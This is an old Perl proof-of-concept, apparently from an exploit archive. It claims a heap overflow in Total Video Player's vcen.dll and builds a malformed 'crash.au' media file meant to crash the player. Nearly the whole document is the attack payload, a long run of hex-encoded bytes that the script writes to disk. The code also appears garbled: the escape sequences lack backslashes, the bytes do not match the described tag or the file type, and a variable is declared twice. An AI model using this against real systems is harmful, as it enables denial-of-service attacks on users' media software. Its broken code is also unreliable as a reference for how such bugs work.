###############################################################################
# Total Video Player (vcen.dll) Remote Heap Overflow Crash
#                                               By Cn4phux.
# Vendor: http://www.effectmatrix.com/
# Risk : high
# 
# The "<? TVP type= ?>" tag fail to handle long strings, which can lead to a Heap overflow in TVP.
# This bug can be remote or local, TVP parse any supplied file for a reconized header even if the header is not corresponding
# to the filetype,
# Tested against Win XP SP1/SP2 FR, and 1.10/1.20 TVP.
   
my $payload =
"x2Ex52x4Dx46x00x00x00x12x00x01x00x00x00x00x00x00".
"x00x06x50x52x4Fx50x00x00x00x32x00x00x00x01x78xD4".
"x00x01x78xD4x00x00x05x78x00x00x05x78x00x00x00xA0".
"x00x00x45x42x00x00x07x41x00x03x75x70x00x00x02xDE".
"x00x02x00x09x43x4Fx4Ex54x00x00x00x40x00x00x00x01".
"x20x00x01x20x00x01x20x00x2Bx00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x4Dx44x50x52x00x00x00xACx00x00x00x00".
"x00x01x78xD4x00x01x78xD4x00x00x05x78x00x00x05x78".
"x00x00x00x00x00x00x07x41x00x00x48x8Fx0Cx41x75x64".
"x69x6Fx20x53x74x72x65x61x6Dx14x61x75x64x69x6Fx2F".
"x78x2Dx70x6Ex2Dx72x65x61x6Cx61x75x64x69x6Fx00x00".
"x00x5Ex2Ex72x61xFDx00x05x00x00x2Ex72x61x35x00x00".
"x00x10x00x05x00x00x00x4Ex00x19x00x00x05x78x00x00".
"x00x00x00x0Bx0Ax36x00x00x00x00x00x10x05x78x01x18".
"x00x00x00x00xACx44x00x00xACx44x00x00x00x10x00x02".
"x67x65x6Ex72x63x6Fx6Fx6Bx01x07x00x00x00x00x00x10".
"x01x00x00x03x08x00x00x25x00x00x00x00x00x08x00x05".
"x4Dx44x50x52x00x00x01xAEx00x00x00x01x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x10x6Cx6Fx67x69x63x61".
"x6Cx2Dx66x69x6Cx65x69x6Ex66x6Fx00x00x01x70x00x00".
"x01x70x00x00x00x00x00x00x00x09x00x00x00x1Fx00x00".
"x0Ex43x6Fx6Ex74x65x6Ex74x20x52x61x74x69x6Ex67x00".
"x00x00x00x00x04x00x00x00x00x00x00x00x33x00x00x09".
"x41x75x64x69x65x6Ex63x65x73x00x00x00x02x00x1Dx31".
"x30x30x25x20x51x75x61x6Cx69x74x79x20x44x6Fx77x6E".
"x6Cx6Fx61x64x20x28x56x42x52x29x3Bx00x00x00x00x1C".
"x00x00x09x61x75x64x69x6Fx4Dx6Fx64x65x00x00x00x02".
"x00x06x6Dx75x73x69x63x00x00x00x00x2Bx00x00x0Dx43".
"x72x65x61x74x69x6Fx6Ex20x44x61x74x65x00x00x00x02".
"x00x11x32x2Fx32x2Fx32x30x30x36x20x36x3Ax35x37x3A".
"x30x31x00x00x00x00x1Ax00x00x0Bx44x65x73x63x72x69".
"x70x74x69x6Fx6Ex00x00x00x02x00x02x20x00x00x00x00".
"x4Fx00x00x0Cx47x65x6Ex65x72x61x74x65x64x20x42x79".
"x00x00x00x02x00x36x48x65x6Cx69x78x20x50x72x6Fx64".
"x75x63x65x72x20x53x44x4Bx20x31x30x2Ex30x20x66x6F".
"x72x20x57x69x6Ex64x6Fx77x73x2Cx20x42x75x69x6Cx64".
"x20x31x30x2Ex30x2Ex30x2Ex35x34x35x00x00x00x00x16".
"x00x00x08x4Bx65x79x77x6Fx72x64x73x00x00x00x02x00".
"x01x00x00x00x00x2Fx00x00x11x4Dx6Fx64x69x66x69x63".
"x61x74x69x6Fx6Ex20x44x61x74x65x00x00x00x02x00x11".
"x32x2Fx32x2Fx32x30x30x36x20x36x3Ax35x37x3Ax30x31".
"x00x00x00x00x1Dx00x00x09x76x69x64x65x6Fx4Dx6Fx64".
"x65x00x00x00x02x00x07x6Ex6Fx72x6Dx61x6Cx00x44x41".
"x54x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41";

my $file="crash.au";
open(my $file, ">>$file") or die "Cannot open $file: $!";
print $file $payload;
close($file);
#Made in Algeria. /Cn4phux

# www.Syue.com [2008-11-24]